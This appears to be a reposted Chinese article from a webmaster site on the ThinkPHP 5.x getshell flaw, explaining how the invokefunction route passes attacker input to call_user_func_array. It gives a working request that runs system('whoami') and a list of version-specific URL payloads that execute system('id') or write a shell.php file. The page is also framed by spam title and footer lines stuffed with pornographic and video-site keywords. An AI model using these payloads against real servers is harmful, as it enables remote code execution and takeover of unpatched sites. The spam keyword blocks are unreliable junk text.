精品免费在线观看-精品欧美-精品欧美成人bd高清在线观看-精品欧美高清不卡在线-精品欧美日韩一区二区

17站長網

17站長網 首頁 安全 腳本攻防 查看內容

thinkphp代碼執行getshell的漏洞解決

2022-9-27 10:03| 查看: 2546 |來源: 互聯網

先來簡單說說前天thinkphp官方修復的一個getshell漏洞,框架對控制器沒有進行足夠的檢測導致的一處getshell 影響的范圍: 5.x < 5.1.31, <= 5.0.23 漏洞危害: 導致系統被提權(你懂的) 這里附上一個自己測試的

先來簡單說說前天thinkphp官方修復的一個getshell漏洞,框架對控制器沒有進行足夠的檢測導致的一處getshell

影響的范圍: 5.x < 5.1.31, <= 5.0.23

漏洞危害: 導致系統被提權(你懂的)

這里附上一個自己測試的 thinkphp的 鏈接  http://www.thinkphp.cn/download/1260.html  版本是5.0.22

先來講下,5.0 跟5.1的區別吧,tp5.1中引入了容器(Container)和門面(Facade)這兩個新的類  tp5.0是沒有這兩個新的類的,

漏洞原理

URL:http://192.168.188.141/public/index.php?s=index/\think\app/invokefunction

我們先來看看App類里的 exec函數里的執行分層控制器的操作

我們這里是把controller 的調用信息跟配置信息全部傳到了 invokeFunction 這個 執行函數里面去了

因為think\App是第二個入口,在tp運行的時候就會被加載 所以用think\App里面的分層控制器的執行操作的時候,需要去調用invokeFunction這個函數。

這個函數有兩個參數,如上圖所示,第一個是函數的名字,第二個參數數組,比如$function傳入BaiDu然后$vars傳入[12,555]就相當于調用BaiDu(12,555)

此處我們把function傳入call_user_func_array然后vars[0]傳入我們要執行的函數的名字vars[1]傳入要執行函數的參數,因為vars是個數組 所以此處我們的get請求需要這樣寫

[code] vars[]=函數名&vars[1][]=參數[/code]

此處是利用php的數組注入

此時此刻就可以開始利用遠程代碼執行漏洞了 比如我們要執行system函數 他的參數是whoami

http://192.168.188.141/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

下面你懂的,作為一個接班人我們要做的就是修復他(為所欲為?),當然官方更新的最新版本是已經修復了的

這里就代碼執行成功,以下奉獻上tp不同版本的payload

[code] ?s=index/\think\Request/input&filter=phpinfo&data=1 ?s=index/\think\Request/input&filter=system&data=id ?s=index/\think\template\driver\file/write&cacheFile=shell.php&content= ?s=index/\think\view\driver\Php/display&content= ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id ?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 ?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id[/code]

以上就是本文的全部內容,希望對大家的學習有所幫助,也希望大家多多支持17站長網。

本文最后更新于 2022-9-27 10:03,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:17tui@17tui.com
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 国产一区二区三区免费视频 | 久久久久久极精品久久久 | 亚洲人成亚洲人成在线观看 | 欧美嘿咻视频 | 欧美 日韩 亚洲另类专区 | 真人视频一级毛片 | 国产在线拍偷自揄观看视频网站 | 国产精品天天看 | 一级毛片免费观看 | 色综合区| 午夜精品一区二区三区在线视 | 婷婷四房综合激情五月性色 | 韩国美女丝袜一区二区 | 一级黄色毛毛片 | 麻豆传媒小视频 | 国产亚洲新品一区二区 | 国产精品美女免费视频大全 | 精品久久久久亚洲 | 国产精品99r8免费视频2022 | 青草娱乐极品免费视频 | 日本欧美中文字幕 | 看黄色录像一级片 | 久久99精品久久久久久黑人 | 国产网曝手机视频在线观看 | 欧美整片第一页 | 免费看欧美毛片大片免费看 | 国产精品久久久久一区二区三区 | 在线观看www妖精免费福利视频 | 欧美在线观看一区二区三区 | 黄色录像视频网站 | 色综合色综合色综合色综合 | 大学生一级毛片高清版 | 国产乱视频在线观看播放 | 美女黄色在线网站大全 | 国内精品久久久久影院6 | 日本一区二区三区四区无限 | 免费看欧美日韩一区二区三区 | 欧美h片在线观看 | 久久综合图区亚洲综合图区 | 国产农村妇女一级毛片视频片 | 精品福利视频在线观看视频 |